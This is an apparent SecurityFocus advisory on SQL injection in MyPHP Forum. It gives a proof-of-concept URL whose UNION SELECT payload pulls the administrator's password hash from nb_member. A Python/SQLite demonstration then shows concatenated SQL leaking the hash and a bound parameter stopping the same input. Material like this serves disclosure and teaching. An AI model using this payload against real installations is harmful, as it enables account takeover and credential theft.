MyPHP Forum Multiple SQL Injection Vulnerabilities

No exploit code is required. The following proof-of-concept request retrieves a hash of the administrator password:

http://www.example.com/[MyPHPForum]/member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1
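Why the request above works and how a bound parameter stops it, as an added example that is not MyPHP Forum's own code. It assumes the profile lookup pastes `member` into a 13-column `SELECT` on `nb_member` (inferred from the column list in the URL), and it uses Python with in-memory SQLite and constructed rows as a stand-in for the PHP application and its database.

```python
import sqlite3

# Column names come from the proof-of-concept URL; the query shape is assumed.
COLS = ["uid", "username", "password", "status", "email", "website", "aim",
        "msn", "location", "sig", "regdate", "posts", "yahoo"]
SELECT = "SELECT " + ", ".join(COLS) + " FROM nb_member WHERE username="

# The `member` value from the proof-of-concept request, verbatim.
POC_MEMBER = ("nonexist' UNION SELECT uid, username, password, status, email, "
              "website, aim, msn, location, sig, regdate, posts, "
              "password as yahoo FROM nb_member WHERE uid='1")


def make_db():
    """In-memory stand-in for nb_member, filled with constructed rows."""
    db = sqlite3.connect(":memory:")
    typed = ["uid INTEGER PRIMARY KEY"] + [c + " TEXT" for c in COLS[1:]]
    db.execute("CREATE TABLE nb_member (" + ", ".join(typed) + ")")
    for uid, name, pw_hash, yahoo in [
        (1, "admin", "constructed-admin-hash", "admin_im"),
        (2, "alice", "constructed-alice-hash", "alice_im"),
    ]:
        db.execute(
            "INSERT INTO nb_member (uid, username, password, yahoo) "
            "VALUES (?, ?, ?, ?)", (uid, name, pw_hash, yahoo))
    return db


def _profile(row):
    # Map a result row onto the profile fields a page template would render.
    return dict(zip(COLS, row)) if row else None


def view_profile_vulnerable(db, member):
    """Assumed vulnerable pattern: user input is pasted into the SQL text."""
    return _profile(db.execute(SELECT + "'" + member + "'").fetchone())


def view_profile_safe(db, member):
    """Hardened: input is bound as data and cannot change the statement."""
    return _profile(db.execute(SELECT + "?", (member,)).fetchone())


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", view_profile_vulnerable(db, POC_MEMBER)["yahoo"])
    print("safe:      ", view_profile_safe(db, POC_MEMBER))
```

With the concatenated query the `yahoo` profile field carries the administrator's password column; with the bound parameter the same input is just a username that matches no member.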


 

Copyright 2010, SecurityFocus